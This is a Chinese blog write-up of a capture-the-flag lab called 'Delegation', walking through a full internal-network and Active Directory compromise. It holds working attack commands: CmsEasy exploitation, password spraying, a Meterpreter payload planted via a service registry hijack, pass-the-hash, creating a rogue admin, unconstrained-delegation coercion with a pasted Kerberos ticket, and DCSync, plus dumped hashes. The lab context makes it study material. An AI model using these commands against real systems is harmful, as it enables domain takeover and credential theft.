【内网渗透】最保姆级的春秋云镜Delegation打靶笔记

于 2024-09-02 22:40:33 发布
阅读量158 收藏 1
点赞数 6
文章标签: 春秋云镜 Delegation 内网渗透 渗透 wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/uuzeray/article/details/141792817
版权

目录

flag1

flag2 

flag3 

flag4 

flag1

./fscan -h 39.101.135.65 -p 1-65535

访问web,cmseasy 

访问./admin后弱口令admin/123456登录后台

 打现成的EXP:CmsEasy_7.7.5_20211012存在任意文件写入和任意文件读取漏洞 | jdr

 连蚁剑

suid提权读flag1

find / -perm -u=s -type f 2>/dev/null
diff --line-format=%L /dev/null /home/flag/flag01.txt

 给到hint,明显是一个域用户

WIN19\Adrian

flag2 

蚁剑上传fscan和frp,扫内网,搭隧道

start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.4.7      is alive
(icmp) Target 172.22.4.36     is alive
(icmp) Target 172.22.4.19     is alive
(icmp) Target 172.22.4.45     is alive
[*] Icmp alive hosts len is: 4
172.22.4.45:139 open
172.22.4.19:139 open
172.22.4.7:139 open
172.22.4.45:135 open
172.22.4.19:135 open
172.22.4.7:135 open
172.22.4.36:21 open
172.22.4.45:80 open
172.22.4.36:80 open
172.22.4.36:22 open
172.22.4.19:445 open
172.22.4.7:445 open
172.22.4.45:445 open
172.22.4.36:3306 open
172.22.4.7:88 open
[*] alive ports len is: 15
start vulscan
[*] NetInfo 
[*]172.22.4.45
   [->]WIN19
   [->]172.22.4.45
[*] NetInfo 
[*]172.22.4.7
   [->]DC01
   [->]172.22.4.7
[*] NetInfo 
[*]172.22.4.19
   [->]FILESERVER
   [->]172.22.4.19
[*] NetBios 172.22.4.45     XIAORANG\WIN19                
[*] OsInfo 172.22.4.7	(Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.4.7      [+] DC:DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.4.19     FILESERVER.xiaorang.lab             Windows Server 2016 Standard 14393
[*] WebTitle http://172.22.4.45        code:200 len:703    title:IIS Windows Server
[*] WebTitle http://172.22.4.36        code:200 len:68100  title:中文网页标题

 结合提示WIN19\Adrian,去打172.22.4.45 ,密码喷洒得到babygirl1这个过期的密码

proxychains4 crackmapexec smb 172.22.4.45 -u Adrian -p rockyou.txt -d WIN19

可以rdp连上去改密码

proxychains4 rdesktop 172.22.4.45 -r disk:share=/home/kali/Desktop/tmp

 先输一遍原账密,再修改登录

直接读flag2没有权限

找到一个风险文件,大意是可以对 gupdate 服务的注册表项进行广泛的修改,包括更改配置、删除和创建新的配置项等。 

msfvenom -p windows/meterpreter/bind_tcp LPORT=1337 -f exe > exp.exe

用kali分享来上传文件

 修改注册表路径并启动进程

reg add HKLM\SYSTEM\CurrentControlSet\Services\gupdate /v ImagePath /t REG_EXPAND_SZ /d "C:\Users\Adrian\Desktop\exp.exe"

sc start gupdate

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set RHOST 172.22.4.45
set LPORT 1337
exploit

ps选一个SYSTEM权限做migrate进程迁移

cat  /users/administrator/flag/flag02.txt

flag3 

hashdump

 Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab:::

打administrato的pth

proxychains4 python psexec.py administrator@172.22.4.45 -hashes "aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab" -codec gbk

创建一个administrator权限用户

net user Z3r4y 0x401@admin /add
net localgroup administrators Z3r4y /add

 再rdp连上去(方便管理员身份运行传上去的工具)

proxychains4 rdesktop 172.22.4.45 -u Z3r4y -d WIN19 -p '0x401@admin' -r disk:share=/home/kali/Desktop/tmp

msf抓一下哈希 

load kiwi
creds_all

 

查看域内委派关系 

proxychains4 python findDelegation.py xiaorang.lab/'WIN19$' -hashes :5943c35371c96f19bda7b8e67d041727 -dc-ip 172.22.4.7

存在一个非约束委派 

先让WIN19监听

C:\Users\Z3r4y\Desktop\Rubeus4.0.exe monitor /interval:1 /filteruser:DC01$ > C:\Users\Z3r4y\Desktop\hash.txt

再利用强认证漏洞强制DC访问WIN19,拿到其TGT票据 

proxychains4 python dfscoerce.py -u "WIN19$" -hashes :dd5b235421f0f6dbdb25a4c6340c5d12 -d xiaorang.lab WIN19 172.22.4.7

 

然后导入票据 

C:\Users\Z3r4y\Desktop\Rubeus4.0.exe ptt /ticket:doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFCo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD6g3j9BWWyCBtzW9N+e2YA4NHLkKKmEtGl2Rw2gvVY41joyg1+9uFfFS2WSwfaElvuPlj4Om2FIDeKt6iylall0pDNtFOiQWeITkNwV3HUJsp+aibhLEg7vSIOdCdwCzPiOR2Da56gTGl59lRUG3gSF2/39AkgjiASVb6m3nyxb1/UixFH6IKzAbVT90Y6AZxHi+I6Z9hwhOAVodcxSSzQxvl1FroQCV66qgC8BqejYtL+KHZ/EAtfZ7gii8K0cqGy70I+Fsffn+WZaE2WtJC2MweQPtixsU3pD9KraBDRQoCmiGmFTMdftaqglApUHyoAx0M30wlIboTPR5V8KKMBwfcm/Id/9WQoe7hI6NtrAk/NpYZHHvMH86a5ckQLHhiyZleEaR4gi6ylBCwF/1tUb88yfXaPHKdN6Ww2+GrcG3medDVUtF8PFOxlMWdxThjcFEnt0Q3LPb2ah4YAM8CbspgTPPRQ/PCVQTy0lllmHT2gJjUzvZFl5mYuaXxQywgv0UEwXyvbBXTy2otaGsNHozVyHY5FLA27q/wJORokp6l4A7o2d4Ndzibdr74kFFDu6E1z06UpDExyX/KEGvVOtp918Yy0Masw3zC40o7hSZDKVNmXx1UmGm6ofytW5yPZNGGfXiEIqqk9JgS1EE1Y4VmCL0VXibIcVCN8Kb4X2qDwiDlSxTV+s+w0S+IYTcphvohdrleWfNEUXViJoegBPsGjTVwbEQGNn2rVOsvOF+DSjS8Lzp+lbcDboXwjTsFGM0eOemgXap1z+M4K8XAqp40Vg8UojV/YTfODC3sxJjlQ4fX28kFewMZiIuxJauXhWYzIq7GxDGk2RXO4rw8Nqu7Z558rvvE1li8nNWJ8onf96Fd/8rWgsNbwXf6IdURaw+k0HHOlNfWQVb8gcrQKhZtm3QnvQOIBUMRM6oHxA72EVl+gFKcKxYlQfhcZ2eKecbYFJWpbcWvlGFGXLe/Ajk345TUQZA39st/wXa34e1tOWbztxZsDrHtKjgoyE9o85UI/MKRRqhBG5s/3EpzALy1+jvXesNHe6zELN8TL4bsX/IASWm2BAj3z6cKRFOBqtJCH+q9ROWAa8rH7tgl/gWt1TT/F2YIHujBK6w7sCC4Rm/410xRBxtpllfO9mNZfBscxs2li9EBu4uM56Ql6ecOpijvD4AsBZ7uTlq+PJfLlAZ7EOq10pX7Kfl5bhSnAruBise1oQRSwydivheyGs/nqo3C0PebXY4oRw+qiffZV7eGylBGYDuiN41VUJLiznGAkAgBwm5znKlnffW1Nk0DyQ81airBLVX9GfH68mHjEReOyYe82t8MRBX3fpR/WNNfBW88HOZWySRsZtmR3+20lgrFE/ZXux8S4USr9zjoSAQDRsSj4fepKFriuTLVEANMuRPpeQ2eRgtgOnWGEjMhrPJ+F8l7jocwEWFImjgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCDrKLK96jdRiyRvxBM1L+fJbrGc15bGbmZnwVT9jkJeHqEOGwxYSUFPUkFORy5MQUKiEjAQoAMCAQGhCTAHGwVEQzAxJKMHAwUAYKEAAKURGA8yMDI0MDkwMjEzMzYyNlqmERgPMjAyNDA5MDIyMzM2MjZapxEYDzIwMjQwOTA5MTMzNjI2WqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDFhJQU9SQU5HLkxBQg==

猕猴桃抓一下哈希 

lsadump::dcsync /domain:xiaorang.lab /all /csv

 

pth 

proxychains4 impacket-smbexec -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab/administrator@172.22.4.19 -codec gbk

 读flag3

type c:\users\Administrator\flag\flag04.txt

flag4 

proxychains4 impacket-smbexec -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab/administrator@172.22.4.7 -codec gbk
type c:\users\Administrator\flag\flag04.txt

Z3r4y
关注
  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
春秋云镜-Delegation-Writeup
qq_35607078的博客
08-14 799
春秋云镜-Delegation-Writeup
内网渗透笔记
haoge1998的博客
05-06 2480
内网渗透思路 ​ 通过域成员主机,定位出域控制器 IP 及域管理员账号,利用域成员主机作为跳板,扩大渗透范围,利用域管理员可以登陆域中任何成员主机的特性,定位出域管理员登陆过的主机 IP,设法从域成员主机内存中 dump 出域管理员密码,进而拿下域控制器、渗透整个内网。 内网基础知识 1、工作组: 工作组是局域网中的一个概念,他是长久的资源管理模式。默认情况下使用工作组方式进行资源管理,将不同的 computer 按照不同的要求分类到不同的组。 2、域: 用来描述一种架构,和“工作组”相对应,由工作组升
ichunqiu云境 - Delegation Writeup
WUfagg的博客
12-10 893
一场内网渗透
内网渗透技巧大全
黑战士的博客
04-28 1415
对于内部帐户,SPN将自动进行注册。SPN扫描的主要好处是,SPN扫描不需要连接到网络上的每个IP来检查服务端口,SPN通过LDAP查询向域控执行服务发现,SPN查询是Kerberos的票据行为一部分,因此比较难检测SPN扫描。参考2 :https://3gstudent.github.io/Office-Persistence-on-x64-operating-system。安装键盘记录的目地不光是记录本机密码,是记录管理员一切的密码,比如说信箱,WEB 网页密码等等,这样也可以得到管理员的很多信息。
内网渗透系列:横向渗透方法小结
闵行小鱼塘
08-04 4310
本文学习并小结下横向渗透的方法
春秋云镜-【仿真场景】Delegation writeup
渗透测试研究中心
03-07 638
0x1 Info靶场地址:https://yunjing.ichunqiu.com/ranking/summary?id=BzMFNFpvUDU 从web到内网再到域的靶场环境都全,且出题的思路很好,感兴趣的可以去玩玩0x2 ReconTarget external IP39.98.34.149Nmap results关注80端口的http服务,目录爆破(省略)找到 /admin使用弱口令登录进...
内网渗透_令牌窃取
qq_42383069的博客
04-07 1424
内网渗透_令牌窃取 0x01. 令牌简介 令牌(Token)是指系统中的临时秘钥,相当于账户和密码,有了令牌就可以在不知道密码的情况下访问目标相关资源了,这些令牌将持续存在于系统中,除非系统重新启动 0x02. 访问令牌的分类 授权令牌(Delegation token):交互式会话登陆(例:本地用户登陆、用户桌⾯等) 模拟令牌(Impersonation token):非交互式登陆(例:net use 访问共享文件) 两种 token 只有在系统重启后才会清除;授权令牌在用户注销后,该令牌会变为模拟令
内网渗透学习01——内网信息收集笔记
box
03-06 5447
内网信息收集 内网信息收集概述   渗透测试进入内网阶段,面对一片 “黑暗森林” 。所以首先对当前的网络环境进行判断。 我是谁? —— 对当前机器角色进行判断。 这在哪? —— 对当前机器所处的网络环境和拓扑结构进行分析和判断。 我在哪? —— 对当前机器所处区域进行判断。   对当前计算机角色判断,是指判断当前计算机是普通Web服务器、FTP服务器、代理服务器、DNS服务器等   对当前计算机所处网络环境的拓扑结构分析和判断,是指对所在的内网进行全面的数据收集和分析整理,绘制出大致的内网结构拓扑图。
内网渗透测试:Windows权限提升思路
qq_45521281的博客
02-21 2155
我的Freebuf:https://www.freebuf.com/author/MrAnonymous 我的博客:https://whoamianony.top/ 文章目录Windows系统内核溢出漏洞提权1. 手动查找系统潜在漏洞2. 自动查找系统潜在漏洞3. 选择漏洞并利用Windows系统错误配置漏洞提权Trusted Service Paths漏洞(可信任服务路径漏洞)系统服务错误权限配置漏洞计划任务与AccessChk使用AccessChk使用自动安装配置文件AlwaysInstallElev.
【Web安全笔记】之【6.0 内网渗透
AA8j的博客
12-23 1269
文章目录6.0 内网渗透6.1 信息收集-Windows6.1.1 基本命令6.1.2 域信息6.1.3 用户信息6.1.4 网络信息6.1.5 防火墙6.1.6密码信息6.1.7 票据信息6.1.8 特殊文件6.1.9 其他6.2 持久化 - Windows6.2.1 隐藏文件6.2.2 LOLBAS1. 简介2. 常见程序6.2.3 后门1. sethc2. 映像劫持3. 定时任务4. 登录脚本5. 屏幕保护程序6. 隐藏用户7. CLR8. Winlogon Helper DLL后门6.2.4 UAC
内网渗透常用提权方式总结
j1044957016的博客
06-01 7516
内网菜鸡艰难学习,希望一样的菜鸡能省去打开一堆链接的时间吧
红队内网攻防渗透内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 223
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
红队内网攻防渗透内网渗透之内网对抗:横向移动篇&Kerberos&委派安全&非约束系&约束系&RBCD资源系&Spooler利用
HACKONE的博客
06-23 274
机器A(域控)访问具有非约束委派权限的机器B的服务,会把当前认证用户(域管用户)的的TGT放在ST票据中,一起发送给机器B,机器B会把TGT存储在lsass进程中以备下次重用。简而言之,非约束委派是指用户账户将自身的TGT转发给服务账户使用。委派是一种域内应用模式,是指将域内用户账户的权限委派给服务账号,服务账号因此能以用户的身份在域内展开活动(请求新的服务等),类似于租房中介房东的关系去理解。攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管理员的TGT,从而模拟域管用户。
内网渗透1
m0_55772907的博客
05-08 1469
一、信息收集 域环境? or 工作组环境? 当我们通过 Web 漏洞或者其他的⼿段获取到了⼀个命令执⾏的⼝⼦后,我们想要对当前服务器进⾏深层次的内⽹ 渗透,那么必须得知道当前机器所在的环境是工作组 还是 域 ,因为两种环境的攻击⼿法不同,所以我们需要根据 不同的环境来做不同的处理! 判断是否在域内 1、查看当前网卡和IP信息: ipconfig /all 2、查看系统详细信息: systeminfo 3、查看当前登录域及域用户 net config workstation 4、
python下载安装.zip
09-01
python下载安装
dbForge Studio 2023 for MySQL Enterprise 10.0.150 x64亲测可用
09-01
用全面的 MySQL GUI 工具简化您的日常工作流程,用于数据库开发、经营管理和行政管理。
mysql实验111111111
最新发布
09-01
mysql实验111111111
弹性力学数值方法:有限元法(FEM):三维弹性问题有限元分析.docx
09-01
弹性力学数值方法:有限元法(FEM):三维弹性问题有限元分析.docx
弹性力学数值方法:迭代法:弹性力学中的多网格方法.docx
09-01
弹性力学数值方法:迭代法:弹性力学中的多网格方法.docx
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值